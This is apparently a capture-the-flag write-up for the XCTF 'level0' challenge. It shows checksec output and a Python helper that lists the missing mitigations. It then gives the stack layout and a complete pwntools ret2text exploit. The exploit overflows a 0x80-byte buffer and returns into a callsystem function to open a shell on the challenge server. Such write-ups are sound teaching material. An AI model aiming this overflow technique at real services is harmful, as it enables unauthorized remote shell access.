xman - level0

ret2text

checksec level0

$ checksec level0
[*] '/home/k1ea4c/桌面/xctf/level0/level0'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

With NX enabled the stack region is non-executable, so there is no way to run shellcode placed in the buffer.
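The checksec output above is the part of the write-up that decides the technique, so here is an added example (not part of the original write-up) that parses pwntools-style checksec lines and reports which mitigations are missing and what each gap means for a stack overflow. The sample input is the output quoted above with the path shortened.

```python
import re

# Constructed sample: the checksec output quoted above (path shortened).
CHECKSEC_OUTPUT = """\
[*] '/home/k1ea4c/level0'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
"""

FIELD_RE = re.compile(r"^\s*(Arch|RELRO|Stack|NX|PIE):\s*(.+?)\s*$")

def parse_checksec(text):
    """Turn pwntools-style checksec output into a {field: value} dict."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields

def assess(fields):
    """Return {mitigation: (enabled, consequence_when_off)} for a stack overflow.

    Missing fields are treated as 'off' so the report errs on the side of
    flagging a binary whose checksec output was incomplete."""
    stack = fields.get("Stack", "no canary").lower()
    nx = fields.get("NX", "nx disabled").lower()
    pie = fields.get("PIE", "no pie").lower()
    relro = fields.get("RELRO", "no relro").lower()
    return {
        "canary": ("no canary" not in stack,
                   "return address overwrite is not detected before ret"),
        "PIE": (not pie.startswith("no pie"),
                "code addresses are fixed, so a return target can be hard-coded"),
        "RELRO": (relro == "full relro",
                  "GOT stays writable, so GOT entries are another overwrite target"),
        "NX": (nx.startswith("nx enabled"),
               "stack is executable, so injected shellcode could run"),
    }

def missing_mitigations(text):
    """Names of mitigations that are off, in report order."""
    return [name for name, (on, _) in assess(parse_checksec(text)).items() if not on]

if __name__ == "__main__":
    for name, (on, why) in assess(parse_checksec(CHECKSEC_OUTPUT)).items():
        print(f"{name:7} {'on ' if on else 'OFF'}  {'' if on else why}")
```

For level0 the report flags canary, PIE and RELRO as off and NX as on, which is exactly why the write-up goes for ret2text rather than shellcode.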

Looking at the binary in IDA, there is a callsystem function; returning into it is enough to get a shell.

Stack layout

High address: ret
              saved rbp
Low address:  buff at rbp-80h

Exploit script

from pwn import *

#sh = process('./level0')          # local test
sh = remote("159.138.137.79", 51829)  # challenge server
context(os='linux', arch='amd64')
callsystem = 0x0000000000400596    # address of callsystem from IDA (no PIE, so fixed)
# buff sits at rbp-0x80: 0x80 bytes of buffer, 8 bytes of saved rbp, then the return address
payload = (0x80+8)*b"a" + p64(callsystem)
sh.send(payload)
sh.interactive()